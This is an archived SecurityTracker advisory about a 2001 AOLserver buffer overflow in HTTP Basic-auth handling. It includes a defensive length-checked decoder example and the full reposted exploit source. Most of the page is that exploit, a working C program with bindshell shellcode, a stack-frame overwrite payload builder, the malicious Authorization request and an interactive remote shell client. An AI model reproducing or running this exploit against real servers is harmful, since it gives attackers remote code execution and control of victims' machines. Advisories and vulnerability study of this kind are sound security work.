SecurityTracker.com
Category:   Application (Web Server/CGI)  >   AOLserver
Vendors:   America Online, Inc.
(Exploit Code) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002381
SecurityTracker URL:  http://securitytracker.com/id/1002381
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 10 2001
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

A user has provided some demonstration exploit code (see the Source Message) that, in some cases, will apparently execute arbitrary code on the server.

For details of the vulnerability, see the Message History for the original Alert.

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   It is reported that AOLserver 3.3.1 and 3.4 are not vulnerable.
Vendor URL:  www.aolserver.com/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
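
The boundary error above concerns an over-long HTTP Basic authentication string being decoded into a fixed-size buffer. The following is an added example, not AOLserver source and not part of the original alert, of a decoder that rejects an over-long credential before writing any output. The function names, the 256-byte AUTH_MAX limit and the sample inputs are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>
#include <strings.h>
#define AUTH_MAX 256   /* assumed credential buffer size, not taken from AOLserver */

/* Map one base64 character to its 6-bit value, or -1 if it is not in the alphabet. */
static int b64val(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Decode "Basic <base64>" into out; returns decoded length, or -1 if malformed or too long. */
int parse_basic_auth(const char *value, char *out, size_t out_cap)
{
    size_t len, i, n = 0;
    unsigned int acc = 0;
    int bits = 0;
    if (!value || !out || out_cap == 0) return -1;
    if (strncasecmp(value, "Basic ", 6) != 0) return -1;
    value += 6;
    len = strlen(value);
    while (len > 0 && value[len - 1] == '=') len--;      /* drop padding */
    /* Length check before any write: 4 characters decode to 3 bytes. */
    if (len > (out_cap - 1) / 3 * 4) return -1;
    for (i = 0; i < len; i++) {
        int v = b64val((unsigned char)value[i]);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n + 1 >= out_cap) return -1;             /* second bound, on the write itself */
            out[n++] = (char)((acc >> bits) & 0xff);
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Constructed input: a credential of n 'A' characters; returns the parser's verdict. */
int demo_credential_of_length(size_t n)
{
    char hdr[1024] = "Basic ", out[AUTH_MAX];
    if (n > sizeof hdr - 7) return -2;                   /* keep the sample inside hdr */
    memset(hdr + 6, 'A', n);                             /* rest of hdr is already zero */
    return parse_basic_auth(hdr, out, sizeof out);
}
```

With a 256-byte buffer the longest accepted credential is 340 base64 characters (255 decoded bytes plus the terminator); anything longer is refused instead of being copied.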

Message History:   This archive entry is a follow-up to the message listed below.
Aug 27 2001 AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code



 Source Message Contents

Subject:  AOLserver exploit code




hi

AOLserver exploit code attached, read the code for further info.

bye

-- 
/* qitest1 - http://www.digit-labs.org/qitest1 *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */


/*
 * AOLserver version 3.2 and prior Linux x86 remote exploit
 * by qitest1 - Wed Sep 5 17:20:10 CEST 2001 
 *
 * Proof of concept code for exploiting the bof in ParseAuth(). I
 * used this vuln as a playground for some tests, all done on a RH6.2
 * box. The fp will be overwritten by a pointer to a fake frame, with 
 * an fp and an eip pointing to the shellcode. Very unstable, segfault 
 * in most cases. 
 *
 * Greets:	grazer and the other hot guys on #!digit-labs 
 *		teleh0r: come back home fratello! =)
 *
 * ..harder times for 0x69, now at http://digit-labs.org/qitest1..
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define	EIP_POS	260
#define SC_ADDR	0xbf1ff9a8
#define FP	0xbf1ff9a0		
#define FAKE_FP 0xbf1ffaf4

  char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
  "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
  "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
  "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
  "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
  "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
  "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
  "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
  "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
  "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
  "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
  "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

  int		sockami(char *host, int port);
  void  	shellami(int sock);  
  void		zbuffami(u_long fp, u_long sc_addr, char *zbuf);	
  int		Ns_HtuuEncode(unsigned char *bufin, 
			      unsigned int nbytes, 
			      char * bufcoded);

int
main(int argc, char **argv)
{
  int	sock;
  char	zbuf[1024], ubuf[1024], sbuf[1024];

  printf("\n  AOLserver version 3.3 and prior exploit by qitest1\n\n");

  if(argc == 1)
	{
	  fprintf(stderr, "Usage: %s <target>\n", argv[0]);
	  exit(1);
	}

  printf("+Connecting to %s...\n", argv[1]);
  sock = sockami(argv[1], 80);
  printf("  connected\n");

  printf("+Building buffer with shellcode len: %d...\n", 
  strlen(shellcode)); 
  memset(zbuf, 0x00, sizeof(zbuf));
  zbuffami(FP, SC_ADDR, zbuf);  
  printf("  done\n");

  printf("+Encoding buffer...\n");
  memset(ubuf, 0x00, sizeof(ubuf));
  Ns_HtuuEncode(zbuf, strlen(zbuf), ubuf);
  printf("  done\n");

  printf("+Making http request...\n");
  sprintf(sbuf, 
  "GET / HTTP/1.0\nAuthorization: Basic %s\r\n\r\n", ubuf);
  send(sock, sbuf, strlen(sbuf), 0);
  printf("  done\n");

  printf("+Waiting for the shellcode to be executed...\n  0x69\n");
  sleep(2);
  sock = sockami(argv[1], 30464);
  shellami(sock);
}

int
sockami(char *host, int port)
{
  struct sockaddr_in    address;
  struct hostent        *hp;
  int                   sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock == -1)
        {
          perror("socket()");
          exit(-1);
        }
 
  hp = gethostbyname(host);
  if(hp == NULL)
        {
          perror("gethostbyname()");
          exit(-1);
        }

  memset(&address, 0, sizeof(address));
  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons(port);

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
        {
          perror("connect()");
          exit(-1);
        }

  return(sock);
}

void
shellami(int sock)
{
  int             n;
  char            recvbuf[1024], *cmd = "id; uname -a\n";
  fd_set          rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock, &rset);
      FD_SET(STDIN_FILENO, &rset);
      select(sock+1, &rset, NULL, NULL, NULL);
      if(FD_ISSET(sock, &rset))
        {
          n = read(sock, recvbuf, 1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.\n");
              exit(0);
            }
          recvbuf[n] = 0;
          printf("%s", recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO, &rset))
        {
          n = read(STDIN_FILENO, recvbuf, 1024);
          if (n > 0)
            {
              recvbuf[n] = 0;
              write(sock, recvbuf, n);
            }
        }
    }
  return;
}

void
zbuffami(u_long fp, u_long sc_addr, char *zbuf)
{
  int   i, n = 0; 

  for(i = 0; i < EIP_POS; i++)
	zbuf[i] = 0x90; 

  /* Fake frame...
   */
  zbuf[0] = (u_char) (FAKE_FP & 0x000000ff);
  zbuf[1] = (u_char)((FAKE_FP & 0x0000ff00) >> 8); 
  zbuf[2] = (u_char)((FAKE_FP & 0x00ff0000) >> 16);
  zbuf[3] = (u_char)((FAKE_FP & 0xff000000) >> 24);

  zbuf[4] = (u_char) (sc_addr & 0x000000ff);
  zbuf[5] = (u_char)((sc_addr & 0x0000ff00) >> 8);
  zbuf[6] = (u_char)((sc_addr & 0x00ff0000) >> 16);
  zbuf[7] = (u_char)((sc_addr & 0xff000000) >> 24);
	
  for(i = EIP_POS - 4 - strlen(shellcode) - 8; i < EIP_POS - 4 - 8; i++)
        zbuf[i] = shellcode[n++];

  /* Padding...
   */	
  for(n = 0; n < 8 ; n++)
        zbuf[i++] = 0x69;
	
  zbuf[EIP_POS - 4] = (u_char) (fp & 0x000000ff);
  zbuf[EIP_POS - 3] = (u_char)((fp & 0x0000ff00) >> 8);
  zbuf[EIP_POS - 2] = (u_char)((fp & 0x00ff0000) >> 16);
  zbuf[EIP_POS - 1] = (u_char)((fp & 0xff000000) >> 24);

  zbuf[EIP_POS] = 0x00;

  /* Extra junk
   */
  for(i = 0; i < 4; i++)
	strcat(zbuf, "\x69\x69\x69\x69");

  return;
}

  static char    six2pr[64] = 
	{
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'
	};

  static unsigned char pr2six[256];

  /* qitest1 and the pleasure of reading... ;pP
   * This routine converts a buffer of bytes to/from RFC 1113
   * printable encoding format.
   * This technique is similar to the familiar Unix uuencode format
   * in that it maps 6 binary bits to one ASCII character (or more
   * aptly, 3 binary bytes to 4 ASCII characters).  However, RFC 1113 
   * does not use the same mapping to printable characters as uuencode. 
   * 
   * Mark Riordan   12 August 1990 and 17 Feb 1991.
   * This code is hereby placed in the public domain. 
   *
   * Encode a single line of binary data to a standard format that
   * uses only printing ASCII characters (but takes up 33% more bytes).
   */
int
Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded)
{

#define ENC(c) six2pr[c]

    register char  *outptr = bufcoded;
    unsigned int    i;

    for (i = 0; i < nbytes; i += 3) {
                /* c1 */
        *(outptr++) = ENC(*bufin >> 2);
                /* c2 */
        *(outptr++) = ENC(((*bufin << 4) & 060) | ((bufin[1] >> 4) & 017));
                /* c3 */
        *(outptr++) = ENC(((bufin[1] << 2) & 074) | ((bufin[2] >> 6) & 03));
                /* c4 */
        *(outptr++) = ENC(bufin[2] & 077);      

        bufin += 3;
    }

    /*
     * If nbytes was not a multiple of 3, then we have encoded too many
     * characters.  Adjust appropriately.
     */
    if (i == nbytes + 1) {
        /* There were only 2 bytes in that last group */
        outptr[-1] = '=';
    } else if (i == nbytes + 2) {
        /* There was only 1 byte in that last group */
        outptr[-1] = '=';
        outptr[-2] = '=';
    }
    *outptr = '\0';
    return (outptr - bufcoded);
}









 
 



Copyright 2021, SecurityGlobal.net LLC